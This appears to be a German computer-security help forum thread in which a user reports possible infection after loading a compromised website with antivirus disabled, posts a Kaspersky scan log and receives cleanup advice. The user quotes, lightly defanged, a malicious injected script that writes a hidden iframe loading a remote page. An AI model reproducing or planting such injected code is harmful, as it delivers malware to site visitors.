hallo,

ich bin eine vollmeise. ich habe für 5 min den kaspersky deaktiviert um eine infizierte webseite bzw. eine datei davon herunterladen zu können und diese dann im editor zu bereinigen. leider habe ich übersehen dass da noch eine weitere infizierte datei ist und hab zudem vergessen kasperksy wieder zu aktivieren und hab dann blöderweise die webseite aufgerufen. beim laden der seite habe ich dann gechekt, dass kasperky nicht aktiv ist und hab sofort das internet abgehängt.

hab dann kaspersky laufen lassen und er hat im firefox cache 4 dateien mit HEUR:Trojan.Script.Generic sowie 2 dateien mit der endung .dll im programmordner von adobe bridge gefunden.

kann es sein, dass in den 10 sekunden wo ich die seite geladen habe, bereits eine infektion statt gefunden hat und dass in dieser kurzen zeit auch schon daten von meinem computer übertragen wurden? ich hatte vor einiger zeit schon mal das problem, wo daten von meinem computer übertragen wurden.

danke für eure hilfe!

lg
harry

Und wie die Dateien genau heissen dürfen wir uns ausdenken?

Bitte Logfiles dazu anzeigen:

So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert mir massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu gross für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

• Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
• Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
• Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
• Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Fehlende Rückmeldung
Dieses Thema wurde aus den Abos gelöscht. Somit bekomm ich keine Benachrichtigung über neue Antworten.
PM an mich falls Du denoch weiter machen willst.

Hinweis: Das Verschwinden der Symptome bedeutet nicht, dass Dein Rechner schon sauber ist.

Jeder andere bitte hier klicken und einen eigenen Thread erstellen

hallo,

hier das logfile:

Code: Alles auswählenAufklappen

ATTFilter

Rootkit Scan: completed 29 days ago   (events: 2, objects: 2323, time: 00:14:34)	
14.12.2012 09:59:31	Task completed				
14.12.2012 09:44:57	Task started				
Rootkit Scan: completed 27 days ago   (events: 2, objects: 2453, time: 00:30:07)	
15.12.2012 15:16:47	Task completed				
15.12.2012 14:46:34	Task started				
Rootkit Scan: completed 27 days ago   (events: 2, objects: 524, time: 00:07:47)	
16.12.2012 10:16:39	Task completed				
16.12.2012 10:08:47	Task started				
Rootkit Scan: completed 25 days ago   (events: 2, objects: 2616, time: 00:15:25)	
17.12.2012 18:51:56	Task completed				
17.12.2012 18:36:27	Task started				
Rootkit Scan: completed 24 days ago   (events: 2, objects: 51, time: 00:09:11)	
18.12.2012 18:15:29	Task completed				
18.12.2012 18:06:11	Task started				
Rootkit Scan: completed 23 days ago   (events: 2, objects: 2334, time: 00:16:05)	
19.12.2012 18:53:35	Task completed				
19.12.2012 18:37:30	Task started				
Rootkit Scan: completed 22 days ago   (events: 2, objects: 2572, time: 00:16:50)	
20.12.2012 18:54:32	Task completed				
20.12.2012 18:37:41	Task started				
Rootkit Scan: completed 22 days ago   (events: 2, objects: 2275, time: 00:16:14)	
21.12.2012 06:56:42	Task completed				
21.12.2012 06:40:28	Task started				
Rootkit Scan: completed 20 days ago   (events: 2, objects: 2240, time: 00:14:30)	
23.12.2012 10:22:22	Task completed				
23.12.2012 10:07:52	Task started				
Rootkit Scan: completed 19 days ago   (events: 2, objects: 2427, time: 00:13:17)	
24.12.2012 10:21:02	Task completed				
24.12.2012 10:07:45	Task started				
Rootkit Scan: malfunction    (events: 1, objects: 0, time: Unknown)	
24.12.2012 14:56:28	Task started				
Rootkit Scan: completed 17 days ago   (events: 2, objects: 2416, time: 00:13:13)	
25.12.2012 14:47:40	Task completed				
25.12.2012 14:34:27	Task started				
Rootkit Scan: completed 16 days ago   (events: 2, objects: 2120, time: 00:11:14)	
26.12.2012 11:18:45	Task completed				
26.12.2012 11:07:31	Task started				
Rootkit Scan: completed 16 days ago   (events: 2, objects: 2233, time: 00:13:20)	
27.12.2012 08:09:44	Task completed				
27.12.2012 07:56:24	Task started				
Rootkit Scan: completed 12 days ago   (events: 2, objects: 2175, time: 00:11:34)	
30.12.2012 12:42:48	Task completed				
30.12.2012 12:31:14	Task started				
Rootkit Scan: completed 11 days ago   (events: 2, objects: 2175, time: 00:11:46)	
31.12.2012 11:03:32	Task completed				
31.12.2012 10:51:46	Task started				
Rootkit Scan: completed 10 days ago   (events: 2, objects: 2234, time: 00:12:54)	
01.01.2013 12:23:54	Task completed				
01.01.2013 12:11:00	Task started				
Rootkit Scan: completed 9 days ago   (events: 2, objects: 2574, time: 00:14:52)	
02.01.2013 12:25:53	Task completed				
02.01.2013 12:11:00	Task started				
Rootkit Scan: completed 8 days ago   (events: 2, objects: 2250, time: 00:12:52)	
04.01.2013 09:25:57	Task completed				
04.01.2013 09:13:05	Task started				
Rootkit Scan: completed 6 days ago   (events: 2, objects: 320, time: 00:02:41)	
05.01.2013 16:00:21	Task completed				
05.01.2013 15:57:37	Task started				
Rootkit Scan: completed 5 days ago   (events: 2, objects: 2366, time: 00:13:49)	
06.01.2013 10:49:25	Task completed				
06.01.2013 10:35:35	Task started				
Rootkit Scan: completed 4 days ago   (events: 2, objects: 2322, time: 00:17:43)	
07.01.2013 19:14:20	Task completed				
07.01.2013 18:56:37	Task started				
Full Scan: completed 2 days ago   (events: 29, objects: 2229281, time: 05:05:55)	
09.01.2013 08:10:43	Task started				
09.01.2013 08:15:16	Task stopped				
09.01.2013 08:15:20	Task started				
09.01.2013 08:26:57	Task stopped				
09.01.2013 08:26:59	Task started				
09.01.2013 08:58:27	Task stopped				
09.01.2013 08:58:31	Task started				
09.01.2013 08:59:54	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\2\48\C2D47d01			
09.01.2013 09:00:24	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\2\DF\188E6d01			
09.01.2013 09:03:09	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\9\AC\51A8Cd01			
09.01.2013 09:04:04	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\C\5E\0C1C7d01			
09.01.2013 09:04:27	Detected: HEUR:Trojan.Script.Generic	C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\C\B9\465B2d01			
09.01.2013 09:11:10	Detected: Packed.Win32.Klone.bq	C:\Programme\Adobe\Adobe Bridge\browser\zip.dll			
09.01.2013 09:11:19	Deleted: Packed.Win32.Klone.bq	C:\Programme\Adobe\Adobe Bridge\browser\zip.dll			
09.01.2013 09:44:02	Task stopped				
09.01.2013 09:44:05	Task started				
09.01.2013 10:20:18	Task stopped				
09.01.2013 10:20:20	Task started				
09.01.2013 10:51:56	Task stopped				
09.01.2013 10:51:58	Task started				
09.01.2013 11:11:43	Task stopped				
09.01.2013 11:11:45	Task started				
09.01.2013 11:57:03	Processing error	D:\##_E-Mails_##\Outlook.pst	Read error		
09.01.2013 12:02:24	Task stopped				
09.01.2013 12:04:57	Task started							
09.01.2013 17:10:52	Task completed				
Rootkit Scan: completed 2 days ago   (events: 2, objects: 2350, time: 00:12:43)	
09.01.2013 17:24:37	Task completed				
09.01.2013 17:11:54	Task started
         

und hier der code der in der index.php sowie den javascripts war:

Code: Alles auswählenAufklappen

ATTFilter

<s c r i p t>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="hxxx://g c l a b r e l s c o n . n e t / a b o u t . p h p"></iframe></div>');</ s c r i p t>
         

Da ist keine Infektion.

Zur Kontrolle:

Quick-Scan mit Malwarebytes

Downloade Dir bitte Malwarebytes

• Installiere das Programm in den vorgegebenen Pfad.
  Vista und Win7 User mit Rechtsklick "als Administrator starten"
• Starte Malwarebytes, klicke auf Aktualisierung --> Suche nach Aktualisierung
• Wenn das Update beendet wurde, aktiviere Quickscan durchführen und drücke auf Scannen.
• Wenn der Scan beendet ist, klicke auf Ergebnisse anzeigen.
• Versichere Dich, dass alle Funde markiert sind und drücke Entferne Auswahl.
• Poste das Logfile, welches sich in Notepad öffnet, hier in den Thread.
• Nachträglich kannst du den Bericht unter "Log Dateien" finden.

super! danke für die hilfe! malwarebytes habe ich zusätzlich installiert und war auch aktiv.

lg
harry

Du liest aber schon was ich schreibe oder?
Du möchtest bitte einen aktuellen Scan machen!

jup, scan läuft schon sein einigen stunden.
lg
harry

Da steht eindeutig was von Quickscan.

Das Thema ist endgültig beendet.